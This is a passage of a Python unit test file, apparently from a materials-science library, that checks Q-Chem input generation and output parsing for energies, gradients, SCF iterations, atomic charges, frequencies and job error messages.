vdwscale 1.1
$end
$solvent
dielectric 20.0
nsolventatoms 2
solventatom 8 1 186 1.30
solventatom 1 2 187 1.01
temperature 300.75
$end
'''
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_ghost_atoms(self):
qctask = QcTask(mol, charge=0, spin_multiplicity=1, exchange="B3LYP", ghost_atoms=[2, 4])
ans = """$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
@H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
@Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
$end
"""
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
mol1 = copy.deepcopy(mol)
mol1.set_charge_and_spin(1, 2)
mol2 = copy.deepcopy(water_mol)
mol2.set_charge_and_spin(-1, 2)
qctask = QcTask([mol1, mol2], title="Test Fragments", exchange="B3LYP",
jobtype="bsse", charge=0, spin_multiplicity=3, basis_set="6-31++G**",
ghost_atoms=[1, 2, 3, 5])
self.elementary_io_verify(str(qctask), qctask)
qctask = QcTask(mol, charge=0, spin_multiplicity=2, exchange="B3LYP", ghost_atoms=[2])
self.assertEqual(qctask.spin_multiplicity, 2)
class TestQcInput(PymatgenTest):
def test_str_and_from_string(self):
ans = '''$comment
Test Methane Opt
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = opt
exchange = b3lyp
basis = 6-31+g*
$end
@@@
$comment
Test Methane Frequency
$end
$molecule
read
$end
$rem
jobtype = freq
exchange = b3lyp
basis = 6-31+g*
$end
@@@
$comment
Test Methane Single Point Energy
$end
$molecule
read
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-311+g(3df,2p)
$end
'''
qctask1 = QcTask(mol, title="Test Methane Opt", exchange="B3LYP",
jobtype="Opt", basis_set="6-31+G*")
qctask2 = QcTask(molecule="read", title="Test Methane Frequency",
exchange="B3LYP", jobtype="Freq", basis_set="6-31+G*")
qctask3 = QcTask(title="Test Methane Single Point Energy",
exchange="B3LYP", jobtype="SP",
basis_set="6-311+G(3df,2p)")
qcinp1 = QcInput(jobs=[qctask1, qctask2, qctask3])
self.assertEqual(str(qcinp1), ans)
qcinp2 = QcInput.from_string(ans)
self.assertEqual(qcinp1.as_dict(), qcinp2.as_dict())
qcinp_mgbf4 = QcInput.from_file(os.path.join(test_dir, "MgBF4_b_overalpped.qcinp"))
self.assertEqual(qcinp_mgbf4.jobs[0].ghost_atoms, [0])
def test_to_and_from_dict(self):
qctask1 = QcTask(mol, title="Test Methane Opt", exchange="B3LYP",
jobtype="Opt", basis_set="6-31+G*")
qctask2 = QcTask(molecule="read", title="Test Methane Frequency",
exchange="B3LYP", jobtype="Freq",
basis_set="6-31+G*")
qctask3 = QcTask(title="Test Methane Single Point Energy",
exchange="B3LYP", jobtype="SP",
basis_set="6-311+G(3df,2p)")
qcinp1 = QcInput(jobs=[qctask1, qctask2, qctask3])
d1 = qcinp1.as_dict()
qcinp2 = QcInput.from_dict(d1)
d2 = qcinp2.as_dict()
self.assertEqual(d1, d2)
class TestQcOutput(PymatgenTest):
def test_energy(self):
ref_energies_text = '''
{
"hf-rimp2.qcout": {
"RIMP2": -2726.6860779805256,
"SCF": -2721.541435904716
},
"hf_b3lyp.qcout": {
"SCF": -2733.1747178920828
},
"hf_ccsd(t).qcout": {
"CCSD": -2726.7627121001865,
"CCSD(T)": -2726.8283514003333,
"MP2": -2726.685664155242,
"SCF": -2721.5414360843106
},
"hf_cosmo.qcout": {
"SCF": -2721.1752937496067
},
"hf_hf.qcout": {
"SCF": -2721.541435904716
},
"hf_lxygjos.qcout": {
"SCF": -2724.0769973875713,
"XYGJ-OS": -2726.3445157759393
},
"hf_mosmp2.qcout": {
"MOS-MP2": -2725.302538779482,
"SCF": -2721.541435904716
},
"hf_mp2.qcout": {
"MP2": -2726.685661962005,
"SCF": -2721.541435904716
},
"hf_pcm.qcout": {
"SCF": -2720.703940318968
},
"hf_qcisd(t).qcout": {
"QCISD": -2726.7853751012344,
"QCISD(T)": -2726.8346541282745,
"SCF": -2721.5414360843106
},
"hf_riccsd(t).qcout": {
"CCSD": -2726.7641790658904,
"CCSD(T)": -2726.829853468723,
"MP2": -2726.6860802173014,
"SCF": -2721.5414360843106
},
"hf_tpssh.qcout": {
"SCF": -2732.938974944255
},
"hf_xyg3.qcout": {
"SCF": -2728.769906036435,
"XYG3": -2731.0640917605806
},
"hf_xygjos.qcout": {
"SCF": -2724.0769973875713,
"XYGJ-OS": -2726.3447230967517
}
}'''
ref_energies = json.loads(ref_energies_text)
parsed_energies = dict()
# noinspection PyUnresolvedReferences
for filename in glob.glob(os.path.join(test_dir, "qchem_energies",
"*.qcout")):
molname = os.path.basename(filename)
qcout = QcOutput(filename)
d = dict(qcout.data[0]["energies"])
parsed_energies[molname] = d
self.assertEqual(sorted(ref_energies.keys()),
sorted(parsed_energies.keys()))
mols = sorted(ref_energies.keys())
for molname in mols:
self.assertEqual(sorted(ref_energies[molname].keys()),
sorted(parsed_energies[molname].keys()))
methods = sorted(ref_energies[molname].keys())
for method in methods:
self.assertAlmostEqual(ref_energies[molname][method],
parsed_energies[molname][method], 2)
def test_unable_to_determine_lambda_in_geom_opt(self):
filename = os.path.join(test_dir, "unable_to_determine_lambda_in_geom_opt.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[0]['has_error'])
self.assertEqual(qcout.data[0]['errors'],
['Lamda Determination Failed',
'Geometry optimization failed'])
def test_geom_opt(self):
filename = os.path.join(test_dir, "thiophene_wfs_5_carboxyl.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.data[0]["jobtype"], "opt")
ans_energies = [(u'SCF', -20179.886441383995),
(u'SCF', -20180.12187218424),
(u'SCF', -20180.150524404988),
(u'SCF', -20180.151628362753),
(u'SCF', -20180.151810235497),
(u'SCF', -20180.15180854295)]
self.assertEqual(qcout.data[0]["energies"], ans_energies)
ans_mol1 = '''Full Formula (H4 C5 S1 O2)
Reduced Formula: H4C5SO2
Charge = -1, Spin Mult = 2
Sites (12)
0 C 0.158839 -0.165379 0.000059
1 C -0.520531 -1.366720 0.000349
2 C -1.930811 -1.198460 -0.000041
3 C -2.297971 0.127429 -0.000691
4 S -0.938312 1.189630 0.000400
5 H -0.014720 -2.325340 0.000549
6 H -2.641720 -2.017721 -0.000161
7 H -3.301032 0.535659 -0.001261
8 C 1.603079 0.076231 -0.000101
9 O 2.131988 1.173581 -0.000330
10 O 2.322109 -1.079218 -0.000021
11 H 3.262059 -0.820188 -0.000171'''
ans_mol_last = '''Full Formula (H4 C5 S1 O2)
Reduced Formula: H4C5SO2
Charge = -1, Spin Mult = 2
Sites (12)
0 C 0.194695 -0.158362 -0.001887
1 C -0.535373 -1.381241 -0.001073
2 C -1.927071 -1.199274 -0.000052
3 C -2.332651 0.131916 0.000329
4 S -0.942111 1.224916 -0.001267
5 H -0.038260 -2.345185 -0.001256
6 H -2.636299 -2.025939 0.000620
7 H -3.339756 0.529895 0.001288
8 C 1.579982 0.071245 -0.002733
9 O 2.196383 1.165675 -0.000178
10 O 2.352341 -1.114671 0.001634
11 H 3.261096 -0.769470 0.003158'''
self.assertEqual(qcout.data[0]["molecules"][0].__str__(), ans_mol1)
self.assertEqual(str(qcout.data[0]["molecules"][-1]), ans_mol_last)
self.assertFalse(qcout.data[0]["has_error"])
ans_gradient = [{'max_gradient': 0.07996,
'gradients': [(-0.0623076, -0.0157774, -2.05e-05),
(0.0260287, 0.0289157, -6e-06),
(-0.015738, 0.0103583, 1.87e-05),
(0.0260219, -0.0028, -1.36e-05),
(-0.0043158, -0.0245896, 2.83e-05),
(4.8e-05, 0.000782, 1.3e-06),
(0.0014679, 0.0020277, 3.9e-06),
(0.0010437, -1.29e-05, -1.04e-05),
(0.0799585, 0.0204159, 1e-06),
(-0.0320357, -0.0421461, 2.1e-06),
(-0.0237691, 0.0247526, -4.6e-06),
(0.0035975, -0.0019264, -3e-07)],
'rms_gradient': 0.02244},
{'max_gradient': 0.02721,
'gradients': [(-0.0195677, -0.0008468, -3.2e-06),
(0.0106798, 0.0039494, 1.11e-05),
(-0.0086473, -0.0012624, -8.1e-06),
(0.0065018, 0.0033749, 5e-07),
(0.0002581, -0.0060831, 7.2e-06),
(-0.0004373, -0.000504, 1.4e-06),
(0.0003216, 0.0001059, -9e-07),
(-0.000814, -5.03e-05, 3e-07),
(0.0272109, 0.001408, -2.06e-05),
(-0.0086971, -0.009251, 8.3e-06),
(-0.0080925, 0.0112191, 2.9e-06),
(0.0012838, -0.0020597, 1.1e-06)],
'rms_gradient': 0.007037},
{'max_gradient': 0.003444,
'gradients': [(0.0021606, 0.0013094, -1.68e-05),
(0.0005757, -0.0002616, -1e-05),
(2.73e-05, -0.0002868, 1.5e-05),
(0.0001088, 0.0006944, -1.23e-05),
(0.0006912, -0.0006523, 6.1e-06),
(-0.0004191, -9.32e-05, -1.3e-06),
(0.0002288, 3.98e-05, 1.8e-06),
(-8.99e-05, -0.0002338, -3.2e-06),
(1.95e-05, -0.0034439, 7.08e-05),
(-0.0008228, -9.18e-05, -2.77e-05),
(-0.0018054, 0.0034031, -2.21e-05),
(-0.0006747, -0.0003834, -3e-07)],
'rms_gradient': 0.001008},
{'max_gradient': 0.002367,
'gradients': [(-0.0001646, 0.0006149, 4.17e-05),
(-0.0004516, -0.0003116, 1.28e-05),
(0.0003366, -3.27e-05, -1.59e-05),
(-0.0003164, 0.0001775, 1.37e-05),
(0.0001399, -0.0001201, -6.9e-06),
(-0.0001374, -1.58e-05, 9e-07),
(-1.19e-05, -3.93e-05, -3.3e-06),
(-1.76e-05, -0.0001233, 5.1e-06),
(9.73e-05, -0.0023668, -0.0001609),
(0.0006998, 0.0009023, 6.31e-05),
(-0.0002169, 0.0014874, 4.95e-05),
(4.28e-05, -0.0001724, 2e-07)],
'rms_gradient': 0.0005339},
{'max_gradient': 0.001246,
'gradients': [(-6.88e-05, 0.0001757, -8.32e-05),
(-0.0002264, -0.0001306, -1.93e-05),
(0.0001526, -1.39e-05, 2.05e-05),
(-0.0001401, 3.8e-06, -2.05e-05),
(1.52e-05, 0.0001152, 8e-06),
(2.01e-05, -3.69e-05, -1e-06),
(-3.62e-05, -3.51e-05, 5.5e-06),
(1.01e-05, -1.23e-05, -6.8e-06),
(9.73e-05, -0.0012462, 0.0003246),
(0.0003926, 0.0008331, -0.0001269),
(-0.0002294, 0.000281, -0.0001009),
(1.3e-05, 6.61e-05, 0.0)],
'rms_gradient': 0.0002814},
{'max_gradient': 0.0006359,
'gradients': [(0.0001036, -0.0001339, 0.0001633),
(0.0001003, 6.98e-05, 3.43e-05),
(-8.28e-05, 1.1e-05, -3.31e-05),
(6.2e-05, -0.0001068, 3.41e-05),
(-5.02e-05, 0.0001346, -1.18e-05),
(8.72e-05, -7.3e-06, 1.5e-06),
(-1.7e-05, 4.9e-06, -1.05e-05),
(1.29e-05, 5.9e-05, 1.26e-05),
(-0.0001059, -5.4e-06, -0.0006359),
(-1.48e-05, 0.0002152, 0.0002469),
(-0.0001335, -0.0003534, 0.0001988),
(3.83e-05, 0.0001124, -1e-07)],
'rms_gradient': 0.0001535}]
self.assertEqual(qcout.data[0]["gradients"], ans_gradient)
ans_inp = '''$molecule
-1 2
C 0.15884000 -0.16538000 0.00006000
C -0.52053000 -1.36672000 0.00035000
C -1.93081000 -1.19846000 -0.00004000
C -2.29797000 0.12743000 -0.00069000
S -0.93831000 1.18963000 0.00040000
H -0.01472000 -2.32534000 0.00055000
H -2.64172000 -2.01772000 -0.00016000
H -3.30103000 0.53566000 -0.00126000
C 1.60308000 0.07623000 -0.00010000
O 2.13199000 1.17358000 -0.00033000
O 2.32211000 -1.07922000 -0.00002000
H 3.26206000 -0.82019000 -0.00017000
$end
$rem
jobtype = opt
exchange = b3lyp
basis = 6-31+g*
$end
'''
self.assertEqual(str(qcout.data[0]['input']), ans_inp)
self.assertTrue(qcout.data[0]['gracefully_terminated'])
ans_scf_iter = [[(-743.3130310589, 0.0561),
(-741.3557302205, 0.00841),
(-740.7031048846, 0.0157),
(-741.5589873953, 0.00303),
(-741.5918010434, 0.00118),
(-741.5966923809, 0.000332),
(-741.5970287119, 0.000158),
(-741.5971282029, 4.38e-05),
(-741.5971448077, 2.17e-05),
(-741.5971501973, 7.7e-06),
(-741.5971533576, 5.05e-06),
(-741.5971541122, 2.7e-06),
(-741.5971544119, 9.48e-07),
(-741.5971544408, 2.61e-07),
(-741.5971544436, 1.21e-07),
(-741.5971544441, 5.45e-08),
(-741.5971544442, 1.77e-08),
(-741.5971544442, 7.79e-09)],
[(-741.5552794274, 0.00265),
(-741.6048574279, 0.000515),
(-741.6037290502, 0.000807),
(-741.6056978336, 0.000188),
(-741.6057976553, 4.78e-05),
(-741.6058045572, 1.54e-05),
(-741.6058057373, 4.51e-06),
(-741.6058061671, 2.91e-06),
(-741.6058062822, 8.32e-07),
(-741.6058063435, 7.17e-07),
(-741.6058063636, 1.97e-07),
(-741.6058063662, 5.03e-08),
(-741.6058063666, 3.35e-08),
(-741.6058063666, 1.24e-08),
(-741.6058063666, 5.25e-09)],
[(-741.6023833754, 0.0013),
(-741.6065067966, 0.000305),
(-741.6057886337, 0.000559),
(-741.6068434004, 7.61e-05),
(-741.6068555361, 3.4e-05),
(-741.6068589376, 5.66e-06),
(-741.6068591778, 2.95e-06),
(-741.60685927, 1.27e-06),
(-741.6068592962, 4.82e-07),
(-741.6068593106, 3.84e-07),
(-741.6068593157, 9.23e-08),
(-741.6068593162, 2.49e-08),
(-741.6068593163, 1.52e-08),
(-741.6068593163, 5.71e-09)],
[(-741.6012175391, 0.000209),
(-741.6068794773, 7.2e-05),
(-741.606851035, 0.000117),
(-741.606899078, 1.53e-05),
(-741.6068997567, 6.01e-06),
(-741.6068998747, 1.68e-06),
(-741.6068998849, 5.32e-07),
(-741.6068998857, 2.76e-07),
(-741.606899886, 6.41e-08),
(-741.606899886, 3.08e-08),
(-741.606899886, 9.5e-09)],
[(-741.6067290885, 0.0001),
(-741.6069044268, 2.64e-05),
(-741.6068991026, 5.29e-05),
(-741.6069065234, 3.51e-06),
(-741.6069065452, 2.49e-06),
(-741.6069065686, 3.57e-07),
(-741.6069065693, 2.59e-07),
(-741.6069065696, 7.05e-08),
(-741.6069065696, 4.44e-08),
(-741.6069065697, 1.52e-08),
(-741.6069065697, 8.17e-09)],
[(-741.6074251344, 0.000129),
(-741.6069044127, 2.43e-05),
(-741.6068998551, 4.95e-05),
(-741.6069064294, 4.49e-06),
(-741.606906478, 2.77e-06),
(-741.6069065049, 5.85e-07),
(-741.6069065068, 2.74e-07),
(-741.6069065073, 6.99e-08),
(-741.6069065074, 3.37e-08),
(-741.6069065075, 1.89e-08),
(-741.6069065075, 7.38e-09)]]
self.assertEqual(qcout.data[0]['scf_iteration_energies'], ans_scf_iter)
def test_multiple_step_job(self):
filename = os.path.join(test_dir, "CdBr2.qcout")
qcout = QcOutput(filename)
self.assertEqual(len(qcout.data), 3)
self.assertEqual(qcout.data[0]['jobtype'], 'opt')
self.assertEqual(qcout.data[1]['jobtype'], 'freq')
ans_thermo_corr_text = '''
{
"Rotational Enthalpy": 0.025714259,
"Rotational Entropy": 0.000833523586,
"Total Enthalpy": 0.199729978,
"Total Entropy": 0.003218965579,
"Translational Enthalpy": 0.038549707,
"Translational Entropy": 0.001851513374,
"Vibrational Enthalpy": 0.109795116,
"Vibrational Entropy": 0.000533928619,
"ZPE": 0.039330241,
"Zero point vibrational energy": 0.039330241,
"gas constant (RT)": 0.025714259
}'''
ans_thermo_corr = json.loads(ans_thermo_corr_text)
self.assertEqual(sorted(qcout.data[1]['corrections'].keys()),
sorted(ans_thermo_corr.keys()))
for k, ref in ans_thermo_corr.items():
self.assertAlmostEqual(qcout.data[1]['corrections'][k], ref)
self.assertEqual(len(qcout.data[1]['molecules']), 1)
ans_mol1 = '''Full Formula (Cd1 Br2)
Reduced Formula: CdBr2
Charge = 0, Spin Mult = 1
Sites (3)
0 Br 0.000000 0.000000 -2.453720
1 Cd 0.000000 0.000000 0.000000
2 Br 0.000000 0.000000 2.453720'''
self.assertEqual(str(qcout.data[1]['molecules'][0]), ans_mol1)
self.assertFalse(qcout.data[1]['has_error'])
self.assertEqual(qcout.data[1]['gradients'], [])
ans_inp = '''$molecule
read
$end
$rem
jobtype = freq
exchange = b3lyp
basis = gen
ecp = gen
max_scf_cycles = 100
scf_guess = gwh
$end
$basis
Br
srlc
****
Cd
srsc
****
$end
$ecp
Br
srlc
****
Cd
srsc
****
$end
'''
self.assertEqual(str(qcout.data[1]['input']), ans_inp)
ans_freq = [{'vib_mode': ((0.17, -0.475, 0.0),
(-0.236, 0.659, 0.0),
(0.17, -0.475, 0.0)),
'frequency': 61.36},
{'vib_mode': ((-0.475, -0.17, 0.0),
(0.659, 0.236, 0.0),
(-0.475, -0.17, 0.0)),
'frequency': 61.36},
{'vib_mode': ((0.0, 0.0, 0.707),
(0.0, 0.0, 0.0),
(0.0, 0.0, -0.707)),
'frequency': 199.94},
{'vib_mode': ((0.0, 0.0, -0.505),
(0.0, 0.0, 0.7),
(0.0, 0.0, -0.505)),
'frequency': 311.74}]
self.assertEqual(qcout.data[1]['frequencies'], ans_freq)
self.assertAlmostEqual(qcout.data[2]['energies'][0][1],
-5296.720741780598, 5)
ans_scf_iter_ene = [[(-176.9147092199, 0.779),
(-156.8236033975, 0.115),
(-152.9396694452, 0.157),
(-183.2743425778, 0.138),
(-182.2994943574, 0.142),
(-181.990425533, 0.143),
(-182.1690180647, 0.142),
(-106.6454708618, 0.239),
(-193.8056267625, 0.0432),
(-193.0854096948, 0.0455),
(-194.6340538334, 0.0062),
(-194.6495072245, 0.00205),
(-194.6508787796, 0.000189),
(-194.6508984743, 2.18e-05),
(-194.6508986262, 2.17e-06)]]
self.assertEqual(qcout.data[2]['scf_iteration_energies'],
ans_scf_iter_ene)
def test_solvent_method(self):
filename = os.path.join(test_dir, "thiophene_wfs_5_carboxyl.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.data[0]["solvent_method"], "NA")
filename = os.path.join(test_dir, "qchem_energies", "hf_cosmo.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.data[0]["solvent_method"], "cosmo")
filename = os.path.join(test_dir, "qchem_energies", "hf_pcm.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.data[0]["solvent_method"], "pcm")
def test_failed_message(self):
scf_file = os.path.join(test_dir, "hf.qcout")
scf_qcout = QcOutput(scf_file)
self.assertTrue(scf_qcout.data[0]['has_error'])
self.assertEqual(scf_qcout.data[0]['errors'],
['Bad SCF convergence',
'Molecular charge is not found',
'Geometry optimization failed'])
geom_file = os.path.join(test_dir, "hf_opt_failed.qcout")
geom_qcout = QcOutput(geom_file)
self.assertTrue(geom_qcout.data[0]['has_error'])
self.assertEqual(geom_qcout.data[0]['errors'],
['Geometry optimization failed'])
def test_abnormal_exit(self):
no_reading_file = os.path.join(test_dir, "no_reading.qcout")
no_reading_qcout = QcOutput(no_reading_file)
self.assertTrue(no_reading_qcout.data[0]['has_error'])
self.assertEqual(no_reading_qcout.data[0]['errors'],
['Exit Code 134',
'Molecular charge is not found',
'No input text',
'Bad SCF convergence'])
exit_code_134_file = os.path.join(test_dir, "exit_code_134.qcout")
ec134_qcout = QcOutput(exit_code_134_file)
self.assertTrue(ec134_qcout.data[0]['has_error'])
self.assertEqual(ec134_qcout.data[0]['errors'],
['Exit Code 134',
'Molecular charge is not found',
'Bad SCF convergence'])
def test_chelp_and_mulliken_charges(self):
filename = os.path.join(test_dir, 'chelpg_charges.qcout')
qcout = QcOutput(filename)
mulliken_charges = [0.393961, -0.281545, 0.066432, 0.019364, -0.186041,
-0.16007, 0.315659, 0.30631, 0.064257, 0.056438,
-0.17695, 0.16976, -0.13326, -0.131853, -0.178711,
0.163697, 0.170148, 0.143329, 0.152702, 0.152929,
0.170475, -0.451542, -0.441554, -0.709834,
-0.592718, 0.20506, 0.211043, 0.204389, 0.546173,
-0.414558, 0.346511]
self.assertEqual(qcout.data[0]['charges']['mulliken'],
mulliken_charges)
chelpg_charges = [0.399404, -0.277179, -0.057502, -0.110085, -0.07107,
-0.274987, 0.475781, 0.423117, -0.054079, -0.101424,
-0.05793, 0.115179, -0.116069, -0.10949, -0.06664,
0.161442, 0.135438, 0.158081, 0.125881, 0.125324,
0.115863, -0.425251, -0.42309, -0.602375, -0.458844,
0.140267, 0.139084, 0.139995, 0.698011, -0.487911,
0.341061]
self.assertEqual(qcout.data[0]['charges']['chelpg'], chelpg_charges)
def test_no_message_scf_opt_fail(self):
so_failfile = os.path.join(test_dir, 'scf_opt_no_message_fail.qcout')
so_failqcout = QcOutput(so_failfile)
self.assertTrue(so_failqcout.data[0]['has_error'])
self.assertEqual(so_failqcout.data[0]['errors'],
['Exit Code 134',
'Molecular charge is not found',
'Bad SCF convergence',
'Geometry optimization failed'])
o_failfile = os.path.join(test_dir, 'opt_fail_no_message.qcout')
o_failqcout = QcOutput(o_failfile)
self.assertEqual(o_failqcout.data[0]['errors'],
['Geometry optimization failed'])
s_failfile = os.path.join(test_dir, 'scf_no_message_fail.qcout')
s_failqcout = QcOutput(s_failfile)
self.assertEqual(s_failqcout.data[0]['errors'],
['Exit Code 134',
'Molecular charge is not found',
'Bad SCF convergence'])
so_successfile = os.path.join(test_dir,
'thiophene_wfs_5_carboxyl.qcout')
so_successqcout = QcOutput(so_successfile)
self.assertFalse(so_successqcout.data[0]['has_error'])
def test_negative_eigen(self):
filename = os.path.join(test_dir, "negative_eigen.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[0]['has_error'])
self.assertEqual(qcout.data[0]["errors"],
['Negative Eigen',
'Molecular charge is not found',
'Bad SCF convergence',
'Geometry optimization failed'])
def test_insufficient_memory(self):
filename = os.path.join(test_dir, "insufficient_memory.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[0]['has_error'])
self.assertEqual(qcout.data[0]['errors'],
['Insufficient static memory',
'Molecular charge is not found',
'Bad SCF convergence',
'Geometry optimization failed'])
def test_freq_seg_too_small(self):
filename = os.path.join(test_dir, "freq_seg_too_small.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[0]['has_error'])
self.assertEqual(qcout.data[0]['errors'],
['Freq Job Too Small',
'Exit Code 134'])
def test_not_enough_total_memory(self):
filename = os.path.join(test_dir, "not_enough_total_memory.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[1]['has_error'])
self.assertEqual(qcout.data[1]["errors"],
['Not Enough Total Memory',
'Exit Code 134'])
def test_killed(self):
filename = os.path.join(test_dir, "killed.qcout")
qcout = QcOutput(filename)
self.assertFalse(qcout.data[0]["has_error"])
self.assertTrue(qcout.data[1]["has_error"])
self.assertEqual(qcout.data[1]["errors"],
['Killed',
'Molecular charge is not found',
'Bad SCF convergence'])
def test_gdm_scf(self):
filename = os.path.join(test_dir, "gmd_scf.qcout")
qcout = QcOutput(filename)
self.assertTrue(qcout.data[0]['has_error'])
self.assertEqual(qcout.data[0]['errors'],
['Exit Code 134',
'Bad SCF convergence',
'Geometry optimization failed'])
self.assertEqual(len(qcout.data[0]['scf_iteration_energies']), 2)
self.assertEqual(len(qcout.data[0]['scf_iteration_energies'][-1]), 192)
self.assertAlmostEqual(qcout.data[0]['scf_iteration_energies'][-1][-1][0],
-1944.945908459, 5)
def test_crazy_scf_values(self):
filename = os.path.join(test_dir, "crazy_scf_values.qcout")
qcout = QcOutput(filename)
ans = [(-28556254.06737586, 6.49e-06),
(-28556254.067382727, 9.45e-06),
(-28556254.067382865, 6.14e-06)]
self.assertEqual(qcout.data[0]["scf_iteration_energies"][-1][-3:], ans)
def test_crowd_gradient_number(self):
filename = os.path.join(test_dir, "crowd_gradient_number.qcout")
qcout = QcOutput(filename)
self.assertEqual(qcout.data[0]['gradients'][0]['gradients'],
[(-0.0307525, 0.0206536, -0.0396255),
(0.0008938, -0.000609, 0.0082746),
(0.042143, -0.0240514, 0.0380298),
(-0.0843578, 0.0002757, 0.0884924),
(0.0356689, -0.0444656, -0.0710646),
(-0.0190554, -0.0308886, -0.0297994),
(0.0470543, -0.0263915, -0.0690973),
(-0.0297801, 0.0296872, -0.0104344),
(0.0504581, -0.0014272, 0.0262245),
(-0.0927323, 0.0750046, 0.0128003),
(0.0183242, -0.0084638, 0.0127388),
(-0.0083989, 0.0111579, -0.0002461),
(-0.0316941, 267.34455, 878.3493251),
(0.017459, 0.0487124, -0.0276365),
(-0.3699134, 0.0110442, 0.0260809),
(0.363931, 0.24044, 0.5192852),
(0.026669, -0.0284192, -0.0347528),
(0.0047475, 0.0049706, 0.0148794),
(-0.077804, 0.003402, 0.000852),
(-6772.1697035, -267.4471902, -878.585931),
(-0.0029556, -0.0616073, -0.0180577),
(-0.0001915, 0.0021213, 0.0006193),
(0.0320436, -0.0073456, -0.01509),
(0.0155112, -0.0035725, 0.0015675),
(-0.0034309, 0.0170739, 0.0074455),
(-0.0088735, -0.0129874, 0.0092329),
(-0.0271963, -0.0258714, 0.0246954),
(0.0025065, 0.0062934, 0.0209733),
(0.0152829, -0.0080239, -0.018902),
(0.0461304, 0.0071952, 0.0012227),
(-0.0272755, -0.0280053, 0.0325455),
(0.0122118, 0.027816, -0.0167773),
(0.0168893, -0.0014211, 0.0039917),
(-0.0048723, 0.0026667, -0.0159952),
(-0.1840467, -0.1425887, -0.3235801),
(0.015975, -0.0922797, 0.0640925),
(0.0267234, 0.1031154, -0.0299014),
(-0.0175591, 0.0081813, -0.0165425),
(0.0119225, 0.0113174, 0.0154056),
(0.0138491, 0.0083436, 0.0188022),
(-0.0151146, -0.0015971, -0.0054462)])
def test_nbo_charges(self):
filename = os.path.join(test_dir, "quinoxaline_anion.qcout")
qcout = QcOutput(filename)
ans = [-0.29291, -0.29807, 0.12715, 0.12715, -0.29807, -0.29291,
0.21284, 0.22287, 0.22287, 0.21284, -0.10866, -0.10866,
0.19699, -0.5602, -0.5602, 0.19699]
self.assertEqual(qcout.data[0]["charges"]["nbo"], ans)
filename = os.path.join(test_dir, "tfsi_nbo.qcout")
qcout = QcOutput(filename)
ans = [2.2274, 2.23584, -0.94183, -0.94575, -0.94719, -0.9423,
0.86201, 0.85672, -0.35698, -0.35373, -0.35782, -0.35647,
-0.35646, -0.35787, -1.26555]
self.assertEqual(qcout.data[0]["charges"]["nbo"], ans)
filename = os.path.join(test_dir, "crowd_nbo_charges.qcout")
qcout = QcOutput(filename)
self.assertEqual(
qcout.data[0]["charges"]["nbo"],
[-0.33917, -0.6104, -0.15912, -0.17751, -0.61817, -0.3357, 0.24671,
0.19942, 0.19325, 0.2362, 0.23982, 0.21985, 0.2305, 0.20444,
0.23179, 0.20491, 0.85965, -0.59655, -0.59561, -0.14789, -0.13859,
-0.32712, -0.33359, 0.21602, 0.22383, 0.2123, 0.22759, 0.2507,
0.20098, 0.18631, 0.24945, 0.19709, 0.20274, -0.34831, -0.56307,
-0.14572, -0.1431, -0.55866, -0.3572, 0.22695, 0.21983, 0.1963,
0.20977, 0.22298, 0.20875, 0.21081, 0.19586, 0.24708, 0.20067,
-0.34288, -0.55793, -0.16806, -0.15609, -0.56464, -0.34695,
0.22555, 0.20417, 0.206, 0.20825, 0.22409, 0.25415, 0.20977,
0.18976, 0.24647, 0.1993, -0.33605, -0.59395, -0.15985, -0.18024,
-0.60646, -0.32742, 0.22909, 0.19347, 0.21872, 0.2203, 0.23518,
0.25185, 0.23523, 0.18666, 0.22737, 0.2205, -0.35902, -0.56138,
-0.14552, -0.14903, -0.55491, -0.3493, 0.22826, 0.21789, 0.19075,
0.20898, 0.21343, 0.21715, 0.20794, 0.19695, 0.2429, 0.18482,
-0.33943, -0.55659, -0.16437, -0.14503, -0.56155, -0.34131,
0.22339, 0.20483, 0.19376, 0.23395, 0.20784, 0.2096, 0.21945,
0.19192, 0.23089, 0.20493, -0.32963, -0.56949, -0.1446, -0.15244,
-0.55482, -0.34848, 0.22802, 0.20471, 0.19704, 0.20744, 0.22332,
0.2206, 0.20734, 0.18871, 0.22907, 0.20741, -0.33856, -0.564,
-0.16575, -0.17422, -0.56032, -0.3426, 0.22585, 0.20169, 0.20529,
0.20836, 0.21329, 0.25353, 0.23374, 0.19306, 0.23582, 0.20196,
-0.34069, -0.56522, -0.17228, -0.17503, -0.55505, -0.34264,
0.22696, 0.19604, 0.20515, 0.23964, 0.2437, 0.2111, 0.21204,
0.19975, 0.2347, 0.18835, -0.34324, -0.55184, -0.16086, -0.15907,
-0.56319, -0.3384, 0.23866, 0.19808, 0.19728, 0.20205, 0.24698,
0.21416, 0.20398, 0.20475, 0.2265, 0.20141, -0.34339, -0.56344,
-0.14955, -0.14878, -0.55906, -0.34506, 0.23937, 0.20027, 0.19671,
0.2085, 0.21693, 0.22164, 0.20863, 0.20703, 0.22889, 0.1916])
def test_simple_aimd(self):
filename = os.path.join(test_dir, "h2o_aimd.qcout")
qcout = QcOutput(filename)
self.assertEqual(len(qcout.data[0]["molecules"]), 11)
def test_homo_lumo(self):
filename = os.path.join(test_dir, "quinoxaline_anion.qcout")
qcout = QcOutput(filename)
for a, b in zip(qcout.data[0]["HOMO/LUMOs"][-1],
[1.00682120282, 2.80277253758]):
self.assertAlmostEqual(a, b, 5)
filename = os.path.join(test_dir, "qchem_energies", "hf_ccsd(t).qcout")
qcout = QcOutput(filename)
